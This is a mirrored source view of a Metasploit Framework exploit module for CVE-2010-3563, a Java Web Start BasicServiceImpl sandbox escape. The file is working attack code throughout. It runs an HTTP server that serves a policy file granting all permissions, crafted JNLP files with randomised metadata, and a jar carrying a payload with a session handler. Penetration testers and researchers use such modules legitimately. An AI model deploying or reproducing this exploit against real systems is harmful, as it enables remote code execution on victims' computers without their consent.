1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00
metasploit-framework/modules/exploits/windows/browser/java_basicservice_impl.rb

142 lines
4.4 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 23:28:54 +02:00
Rank = ExcellentRanking
2013-08-30 23:28:54 +02:00
include Msf::Exploit::Remote::HttpServer
# Internet explorer freaks out and shows the scary yellow info bar if this
# is in an iframe. The exploit itself also creates a couple of scary popup
# windows about "downloading application" that I haven't been able to
# figure out how to prevent. For both of these reasons, don't include it
# in Browser Autopwn.
#include Msf::Exploit::Remote::BrowserAutopwn
#autopwn_info({ :javascript => false })
2013-08-30 23:28:54 +02:00
def initialize( info = {} )
2013-08-30 23:28:54 +02:00
super( update_info( info,
'Name' => 'Sun Java Web Start BasicServiceImpl Code Execution',
'Description' => %q{
This module exploits a vulnerability in Java Runtime Environment
that allows an attacker to escape the Java Sandbox. By injecting
a parameter into a javaws call within the BasicServiceImpl class
the default java sandbox policy file can be therefore overwritten.
The vulnerability affects version 6 prior to update 22.
2013-08-30 23:28:54 +02:00
NOTE: Exploiting this vulnerability causes several sinister-looking
popup windows saying that Java is "Downloading application."
},
'License' => MSF_LICENSE,
'Author' => [
'Matthias Kaiser', # Discovery, PoC, metasploit module
'egypt' # metasploit module
],
'References' =>
[
[ 'CVE', '2010-3563' ],
[ 'OSVDB', '69043' ],
[ 'URL', 'http://mk41ser.blogspot.com' ],
],
'Platform' => %w{ java win },
2013-08-30 23:28:54 +02:00
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Windows x86',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[ 'Generic (Java Payload)',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java',
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 12 2010'
))
end
2013-08-30 23:28:54 +02:00
def on_request_uri( cli, request )
jpath = get_uri(cli)
2013-08-30 23:28:54 +02:00
case request.uri
when /java.security.policy/
print_status("Checking with HEAD")
ack = "OK"
send_response(cli, ack, { 'Content-Type' => 'application/x-java-jnlp-file' })
2013-08-30 23:28:54 +02:00
when /all.policy/
all = "grant {permission java.security.AllPermission;};\n"
print_status("Sending all.policy")
send_response(cli, all, { 'Content-Type' => 'application/octet-stream' })
2013-08-30 23:28:54 +02:00
when /init.jnlp/
init = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp href="#{jpath}/init.jnlp" version="1">
#{jnlp_info}
2013-08-30 23:28:54 +02:00
<application-desc main-class="BasicServiceExploit">
<argument>#{jpath}</argument>
</application-desc>
</jnlp>
EOS
2013-08-30 23:28:54 +02:00
print_status("Sending init.jnlp")
send_response(cli, init, { 'Content-Type' => 'application/x-java-jnlp-file' })
2013-08-30 23:28:54 +02:00
when /exploit.jnlp/
expl = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
2013-08-30 23:28:54 +02:00
<jnlp href="#{jpath}/exploit.jnlp" version="1">
#{jnlp_info}
2013-08-30 23:28:54 +02:00
<application-desc main-class="Exploit"/>
</jnlp>
EOS
2013-08-30 23:28:54 +02:00
print_status("Sending exploit.jnlp")
send_response(cli, expl, { 'Content-Type' => 'application/x-java-jnlp-file' })
2013-08-30 23:28:54 +02:00
when /\.jar$/i
p = regenerate_payload(cli)
paths = [
[ "BasicServiceExploit.class" ],
[ "Exploit.class" ],
]
dir = [ Msf::Config.data_directory, "exploits", "cve-2010-3563" ]
jar = p.encoded_jar
jar.add_files(paths, dir)
print_status("Sending Jar")
send_response(cli, jar.pack, { 'Content-Type' => "application/octet-stream" })
handler(cli)
2013-08-30 23:28:54 +02:00
else
print_status("Sending redirect to init.jnlp")
send_redirect(cli, get_resource() + '/init.jnlp', '')
2013-08-30 23:28:54 +02:00
end
end
2013-08-30 23:28:54 +02:00
def jnlp_info
buf = <<-EOS
<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.6+"/>
<jar href="#{get_uri}/exploit.jar"/>
</resources>
EOS
2013-08-30 23:28:54 +02:00
end
end